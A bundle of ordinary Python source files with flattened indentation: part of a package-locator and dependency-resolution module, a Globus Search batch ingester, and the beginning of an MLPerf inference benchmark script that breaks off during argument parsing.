md.license = data.get('license')
md.keywords = data.get('keywords', [])
md.summary = data.get('summary')
dist = Distribution(md)
dist.locator = self
urls = d['urls']
result[md.version] = dist
for info in d['urls']:
url = info['url']
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result['urls'].setdefault(md.version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# Now get other releases
for version, infos in d['releases'].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info['url']
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result['urls'].setdefault(version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
self.errors.put(text_type(e))
logger.exception('JSON fetch failed: %s', e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile("""
(rel\\s*=\\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\\s\n]*))\\s+)?
href\\s*=\\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\\s\n]*))
(\\s+rel\\s*=\\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\\s\n]*)))?
""", re.I | re.S | re.X)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path),
params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict('')
rel = (d['rel1'] or d['rel2'] or d['rel3'] or
d['rel4'] or d['rel5'] or d['rel6'])
url = d['url1'] or d['url2'] or d['url3']
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
'deflate': zlib.decompress,
'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(b)).read(),
'none': lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O.
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
self.platform_check = False # See issue #112
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
t.setDaemon(True)
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, '%s/' % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug('Queueing %s', url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(r'\b(linux_(i\d86|x86_64|arm\w+)|'
r'win(32|_amd64)|macosx_?\d+)\b', re.I)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if an URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self.platform_check and self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug('process_download: %s -> %s', url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(self.source_extensions + self.binary_extensions +
self.excluded_extensions):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ('homepage', 'download'):
result = False
elif scheme not in ('http', 'https', 'ftp'):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(':', 1)[0]
if host.lower() == 'localhost':
result = False
else:
result = True
logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
try:
self._seen.add(link)
if (not self._process_download(link) and
self._should_queue(link, url, rel)):
logger.debug('Queueing %s from %s', link, url)
self._to_fetch.put(link)
except MetadataInvalidError: # e.g. invalid versions
pass
except Exception as e: # pragma: no cover
self.errors.put(text_type(e))
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
#logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
Get the HTML for an URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), 'index.html')
if url in self._page_cache:
result = self._page_cache[url]
logger.debug('Returning %s from cache: %s', url, result)
else:
host = netloc.split(':', 1)[0]
result = None
if host in self._bad_hosts:
logger.debug('Skipping %s due to bad host %s', url, host)
else:
req = Request(url, headers={'Accept-encoding': 'identity'})
try:
logger.debug('Fetching %s', url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug('Fetched %s', url)
headers = resp.info()
content_type = headers.get('Content-Type', '')
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get('Content-Encoding')
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = 'utf-8'
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError: # pragma: no cover
data = data.decode('latin-1') # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception('Fetch failed: %s: %s', url, e)
except URLError as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile('<a href=[^>]*>([^<]+)<')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException('Unable to get %s' % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
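# Illustrative usage sketch of SimpleScrapingLocator (network-dependent; the
# project name is arbitrary):
#
#     locator = SimpleScrapingLocator('https://pypi.org/simple/', timeout=3.0)
#     versions = locator.get_project('sarge')
#     # keys are version strings plus the bookkeeping keys 'urls' and 'digests'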
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
is searched.
"""
self.recursive = kwargs.pop('recursive', True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path): # pragma: no cover
raise DistlibException('Not a directory: %r' % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
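# Illustrative usage sketch of DirectoryLocator (the path is an assumption):
#
#     locator = DirectoryLocator('/path/to/wheelhouse', recursive=False)
#     dist = locator.locate('foo (== 1.0)')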
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
data = get_project_data(name)
if data:
for info in data.get('files', []):
if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(data['name'], info['version'],
summary=data.get('summary',
'Placeholder for summary'),
scheme=self.scheme)
md = dist.metadata
md.source_url = info['url']
# TODO SHA256 digest
if 'digest' in info and info['digest']:
dist.digest = ('md5', info['digest'])
md.dependencies = info.get('requirements', {})
dist.exports = info.get('exports', {})
result[dist.version] = dist
result['urls'].setdefault(dist.version, set()).add(info['url'])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {'urls': {}, 'digests': {}}
else:
result = {
dist.version: dist,
'urls': {dist.version: set([dist.source_url])},
'digests': {dist.version: set([None])}
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop('merge', False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get('urls', {})
digests = result.get('digests', {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get('urls')
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get('digests')
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator('https://pypi.org/simple/',
timeout=3.0),
scheme='legacy')
locate = default_locator.locate
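# Illustrative usage of the module-level convenience function (a sketch;
# requires network access, and the named project is arbitrary):
#
#     dist = locate('sarge (>= 0.1)')
#     if dist is not None:
#         print(dist.name_and_version, dist.source_url)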
NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*'
r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$')
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug('adding distribution %s', dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug('removing distribution %s', dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError: # pragma: no cover
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distribution which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(('cantreplace', provider, other,
frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ':*:' in meta_extras:
meta_extras.remove(':*:')
# :meta: and :run: are implicitly included
meta_extras |= set([':test:', ':build:', ':dev:'])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug('passed %s as requirement', odist)
else:
dist = odist = self.locator.locate(requirement,
prereleases=prereleases)
if dist is None:
raise DistlibException('Unable to locate %r' % requirement)
logger.debug('located %s', odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
#import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if meta_extras and dist in install_dists:
for key in ('test', 'build', 'dev'):
e = ':%s:' % key
if e in meta_extras:
ereqts |= getattr(dist, '%s_requires' % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug('No providers found for %r', r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug('Cannot satisfy %r', r)
problems.add(('unsatisfied', r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug('Adding %s to install_dists',
provider.name_and_version)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug('%s is a build-time dependency only.',
dist.name_and_version)
logger.debug('find done for %s', odist)
return dists, problems
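# Illustrative usage sketch of DependencyFinder (network-dependent; the
# requirement is arbitrary):
#
#     finder = DependencyFinder()
#     dists, problems = finder.find('sarge (>= 0.1)')
#     for problem in problems:
#         print(problem)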
|
ingester.py
|
import sys
import json
import os
import multiprocessing
from queue import Empty
from tqdm import tqdm
from globus_sdk import GlobusAPIError
from mdf_forge.toolbox import format_gmeta, confidential_login
from mdf_refinery.config import PATH_FEEDSTOCK, PATH_CREDENTIALS
NUM_SUBMITTERS = 5
def ingest(mdf_source_names, globus_index, batch_size=100, verbose=False):
''' Ingests feedstock from file.
Arguments:
mdf_source_names (str or list of str): Dataset name(s) to ingest.
Special value "all" will ingest all feedstock in the feedstock directory.
globus_index (str): The Globus Search index to ingest into.
batch_size (int): Max size of a single ingest operation. -1 for unlimited. Default 100.
verbose (bool): Print status messages? Default False.
'''
if type(mdf_source_names) is str:
mdf_source_names = [mdf_source_names]
if "all" in mdf_source_names:
mdf_source_names = [feed.replace("_all.json", "") for feed in os.listdir(PATH_FEEDSTOCK) if feed.endswith("_all.json")]
if verbose:
print("\nStarting ingest of:\n", mdf_source_names, "\nIndex:", globus_index, "\nBatch size:", batch_size, "\n")
with open(os.path.join(PATH_CREDENTIALS, "ingester_login.json")) as cred_file:
creds = json.load(cred_file)
creds["index"] = globus_index
ingest_client = confidential_login(credentials=creds)["search_ingest"]
# Set up multiprocessing
ingest_queue = multiprocessing.JoinableQueue()
counter = multiprocessing.Value('i', 0)
killswitch = multiprocessing.Value('i', 0)
# One reader process (using more than one can reduce performance when several large datasets are submitted at once)
reader = multiprocessing.Process(target=queue_ingests, args=(ingest_queue, mdf_source_names, batch_size))
# As many submitters as is feasible
submitters = [multiprocessing.Process(target=process_ingests, args=(ingest_queue, ingest_client, counter, killswitch)) for i in range(NUM_SUBMITTERS)]
prog_bar = multiprocessing.Process(target=track_progress, args=(counter, killswitch))
reader.start()
[s.start() for s in submitters]
if verbose:
prog_bar.start()
reader.join()
ingest_queue.join()
killswitch.value = 1
[s.join() for s in submitters]
if prog_bar.is_alive():
prog_bar.join()
if verbose:
print("Ingesting complete")
def queue_ingests(ingest_queue, sources, batch_size):
for source_name in sources:
list_ingestables = []
with open(os.path.join(PATH_FEEDSTOCK, source_name+"_all.json"), 'r') as feedstock:
for json_record in feedstock:
record = format_gmeta(json.loads(json_record))
list_ingestables.append(record)
if batch_size > 0 and len(list_ingestables) >= batch_size:
full_ingest = format_gmeta(list_ingestables)
ingest_queue.put(json.dumps(full_ingest))
list_ingestables.clear()
# Check for partial batch to ingest
if list_ingestables:
full_ingest = format_gmeta(list_ingestables)
ingest_queue.put(json.dumps(full_ingest))
list_ingestables.clear()
def process_ingests(ingest_queue, ingest_client, counter, killswitch):
while killswitch.value == 0:
try:
ingestable = json.loads(ingest_queue.get(timeout=10))
except Empty:
continue
try:
res = ingest_client.ingest(ingestable)
if not res["success"]:
raise ValueError("Ingest failed: " + str(res))
elif res["num_documents_ingested"] <= 0:
raise ValueError("No documents ingested: " + str(res))
        except GlobusAPIError as e:
            print("\nA Globus API Error has occurred. Details:\n", e.raw_json, "\n")
            # mark the item done before skipping it, otherwise ingest_queue.join()
            # in ingest() would block forever on a failed batch
            ingest_queue.task_done()
            continue
with counter.get_lock():
counter.value += 1
ingest_queue.task_done()
def track_progress(counter, killswitch):
with tqdm(desc="Ingesting feedstock batches") as prog:
old_counter = 0
while killswitch.value == 0:
# Update tqdm with difference in all counters
new_counter = counter.value
prog.update(new_counter - old_counter)
old_counter = new_counter
|
main.py
|
"""
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import sys
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
import re
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_pytorch":
(imagenet.Imagenet, dataset.pre_process_imagenet_pytorch, dataset.PostProcessArgMax(offset=0),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False,0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3],"use_label_map": True}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3],"use_label_map": False}),
}
# pre-defined command line options to simplify things. They are used as defaults and can be
# overridden from the command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-resnet34",
},
}
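# Example invocation (illustrative; the model and dataset paths are placeholders):
#   python main.py --profile resnet50-onnxruntime --model ./resnet50.onnx \
#       --dataset-path /data/imagenet --accuracy
# Any option not given on the command line is filled in from the selected profile.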
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument('--tune', dest='tune', action='store_true',
help='tune best int8 model on calibration dataset')
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", default="output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--model-name", help="name of the mlperf model, ie. resnet50")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", \
help="enable finding peak performance pass")
parser.add_argument("--debug", action="store_true", help="debug, turn traces on")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../../../utils/MLPerf/mlperf.conf", \
help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", \
help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
